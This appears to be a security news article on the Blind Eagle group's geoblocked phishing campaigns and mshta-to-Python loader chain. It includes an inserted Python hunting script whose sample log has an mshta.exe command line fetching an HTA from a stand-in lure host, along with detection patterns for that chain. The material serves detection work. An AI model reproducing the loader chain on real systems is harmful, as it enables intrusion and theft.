Blind Eagle Hacker Group Launching Indiscriminate Attacks Using Powerful Toolset

Researchers report that the organized threat actor known as Blind Eagle (tracked as APT-C-36) has resurfaced with a refined toolset and one of the more elaborate infection chains seen in attacks on Colombian and Ecuadorian organizations.

Blind Eagle is a Spanish-speaking hacker group, and researchers at Check Point recently documented the group's latest:-

  • Tactics and techniques
  • Powerful Tools
  • Government-themed lures

Active since at least 2018, Blind Eagle has kept a narrow geographical focus on South American nations, attacking organizations there indiscriminately rather than selecting individual targets. In September 2021, Trend Micro published a report documenting the group's activities.

Banks Targeted With Campaigns

BitRAT is distributed via spear-phishing campaigns that primarily target Colombian entities, with a lesser focus on targets in the following countries:-

  • Ecuador
  • Spain
  • Panama

Below is a list of some of the banks that are targeted:-

  • Banco AV Villas
  • Banco Caja Social
  • Banco de Bogotá
  • Banco Popular
  • Bancoomeva
  • BBVA
  • Colpatria
  • Davivienda
  • TransUnion

In-Memory Meterpreter

The attack sequence is aborted if the email recipient is located outside Colombia; in that case the victim is simply redirected to the official website of Migración Colombia, so an analyst or sandbox outside the country sees nothing malicious.

A second campaign, impersonating the Ecuadorian Internal Revenue Service (SRI), targets Colombia and Ecuador in a similar way. It uses the same geoblocking technique to filter out requests that originate from countries other than the one it targets.

Rather than simply dropping a RAT, this campaign uses a more complex multi-stage process that abuses the legitimate mshta.exe binary: it executes VBScript embedded inside an HTML file, which in turn downloads two Python scripts.

The two python scripts are listed below:-

  • ByAV2.py
  • mp.py
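To make that chain concrete for detection engineers, here is an added example (not code from the article or from Check Point's research) that hunts for the mshta.exe -> VBScript -> Python sequence in process-creation telemetry. The log records are constructed to resemble Sysmon Event ID 1 entries exported as JSON; the script names ByAV2.py and mp.py come from the article, while the user name, temp paths, ProcessGuid values and the lure hostname (sri-tramites.example) are assumptions made for the sample.

```python
"""Hunt for the mshta.exe -> VBScript -> Python loader chain in endpoint logs.

Added example, not code from the original article or from Check Point.
The log lines below are constructed to resemble Sysmon Event ID 1 (process
creation) records exported as JSON; field names follow Sysmon's. Script
names ByAV2.py and mp.py are taken from the article; the user, temp paths,
ProcessGuid values and the lure hostname are invented for the sample.
"""
import json
import re

# mshta.exe pulling content from a URL or a UNC share rather than a local file.
REMOTE_SOURCE = re.compile(r"https?://|\\\\[^\\]+\\", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
PYTHON_IMAGES = {"python.exe", "pythonw.exe"}
MAX_ANCESTOR_DEPTH = 4  # how far up the process tree to look for a script host

# Constructed sample: one benign local HTA launch, then a suspicious chain
# Outlook -> mshta.exe (remote HTA) -> python.exe ByAV2.py / mp.py.
SAMPLE_LOG = r"""
{"EventID": 1, "ProcessGuid": "{a1}", "ParentProcessGuid": "{a0}", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe C:\\Program Files\\Vendor\\help.hta", "ParentImage": "C:\\Program Files\\Vendor\\app.exe"}
{"EventID": 1, "ProcessGuid": "{b1}", "ParentProcessGuid": "{b0}", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "CommandLine": "OUTLOOK.EXE", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 1, "ProcessGuid": "{b2}", "ParentProcessGuid": "{b1}", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe http://sri-tramites.example/comprobante.hta", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"}
{"EventID": 1, "ProcessGuid": "{b3}", "ParentProcessGuid": "{b2}", "Image": "C:\\Users\\ana\\AppData\\Local\\Programs\\Python\\python.exe", "CommandLine": "python.exe C:\\Users\\ana\\AppData\\Local\\Temp\\ByAV2.py", "ParentImage": "C:\\Windows\\System32\\mshta.exe"}
{"EventID": 1, "ProcessGuid": "{b4}", "ParentProcessGuid": "{b2}", "Image": "C:\\Users\\ana\\AppData\\Local\\Programs\\Python\\python.exe", "CommandLine": "python.exe C:\\Users\\ana\\AppData\\Local\\Temp\\mp.py", "ParentImage": "C:\\Windows\\System32\\mshta.exe"}
"""


def basename(path):
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def script_host_ancestor(event, by_guid):
    """Return the nearest ancestor that is a Windows script host, or None."""
    node = by_guid.get(event["ParentProcessGuid"])
    for _ in range(MAX_ANCESTOR_DEPTH):
        if node is None:
            return None
        if basename(node["Image"]) in SCRIPT_HOSTS:
            return node
        node = by_guid.get(node["ParentProcessGuid"])
    return None


def hunt(events):
    """Flag both links of the chain: remote HTA via mshta, then Python under a script host."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    findings = []
    for e in events:
        image = basename(e["Image"])
        if image == "mshta.exe" and REMOTE_SOURCE.search(e["CommandLine"]):
            findings.append({"rule": "mshta_remote_content",
                             "guid": e["ProcessGuid"], "cmd": e["CommandLine"]})
        if image in PYTHON_IMAGES:
            host = script_host_ancestor(e, by_guid)
            if host is not None:
                findings.append({"rule": "python_from_script_host",
                                 "guid": e["ProcessGuid"], "cmd": e["CommandLine"],
                                 "via": basename(host["Image"])})
    return findings


if __name__ == "__main__":
    for finding in hunt(parse_events(SAMPLE_LOG)):
        print(finding)
```

The first rule deliberately lets the local help.hta launch through, since vendor installers use mshta.exe legitimately; the parent-child rule is the higher-confidence signal, because a Python interpreter started under mshta.exe, wscript.exe or cscript.exe has very few benign explanations on a workstation. Because the lure's geoblocking hides the payload from sandboxes outside the targeted country, endpoint process telemetry like this is often the first place the chain becomes visible.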

Blind Eagle is an unusual APT group in terms of its attacks. Judging by its toolset and routine operations, the group appears more interested in cybercrime and monetary gain than in espionage.


Gurubaran

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.
